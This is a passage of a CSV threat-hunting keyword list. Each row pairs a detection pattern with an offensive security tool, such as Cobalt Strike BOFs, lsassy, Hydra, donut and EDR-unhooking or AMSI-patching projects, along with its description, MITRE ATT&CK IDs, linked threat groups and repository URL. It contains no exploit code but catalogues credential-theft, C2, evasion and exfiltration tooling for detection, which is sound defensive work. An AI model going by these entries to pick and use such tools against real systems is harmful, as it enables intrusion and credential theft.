T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*test_litefuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*test_lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*test_mitm_initialization.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*test_nanodump_exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 
- TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*test_pacu_update.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*test_tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TestConsoleApp_YSONET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*Test-ContainsAmsiPSTokenSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Test-DllExists*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" 
+"*Test-DllExists*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*tester@egress-assess.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*testHeapOverflow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Test-HijackableDll*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*testing* testing* 1* 2* 3 *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Test-ServiceDaclPermission*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*TestWinRMMachines*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*tevora-threat/SharpView/*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*text_to_shellcode\*.exe*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A",,"N/A",,, +"*TexttoExe.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*tezos2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*tgscrack.go*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" +"*tgsrepcrack.*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*tgsrepcrack.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*TGSThief-main*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*tgtdelegation *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable 
TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*tgtdelegation.cna*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*tgtdelegation.x64*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*tgtdelegation.x86*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*tgtParse.py *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*th3rd/heroinn*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*TH3xACE/EDR-Test*","offensive_tool_keyword","EDR-Test","Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/EDR-Test","1","1","N/A","N/A","2","140","19","2023-03-27T11:39:32Z","2022-03-27T08:58:49Z" +"*thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*the-backdoor-factory-master*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*TheD1rkMtr/AMSI_patch*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*TheD1rkMtr/D1rkInject*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*TheD1rkMtr/DocPlz*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*TheD1rkMtr/GithubC2*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*TheD1rkMtr/HeapCrypt*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - 
T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*TheD1rkMtr/NTDLLReflection*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*TheD1rkMtr/Pspersist*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" +"*TheD1rkMtr/Shellcode-Hide*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*TheD1rkMtr/StackCrypt*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" 
+"*TheD1rkMtr/UnhookingPatch*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*TheGejr/SpringShell*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/TheGejr/SpringShell","1","1","N/A","N/A","2","124","86","2022-04-04T14:09:11Z","2022-03-30T17:05:46Z" +"*theHarvester*","offensive_tool_keyword","theHarvester","E-mails. subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/theHarvester","1","0","N/A","N/A","10","9256","1843","2023-10-02T22:12:14Z","2011-01-01T20:40:15Z" +"*thelinuxchoice/tweetshell*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*ThePorgs/Exegol-images*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - 
TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*therealwover@protonmail.com*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*thewover/donut*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*thief.py -*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*third_party/SharpGen*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*third-party*winvnc*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - 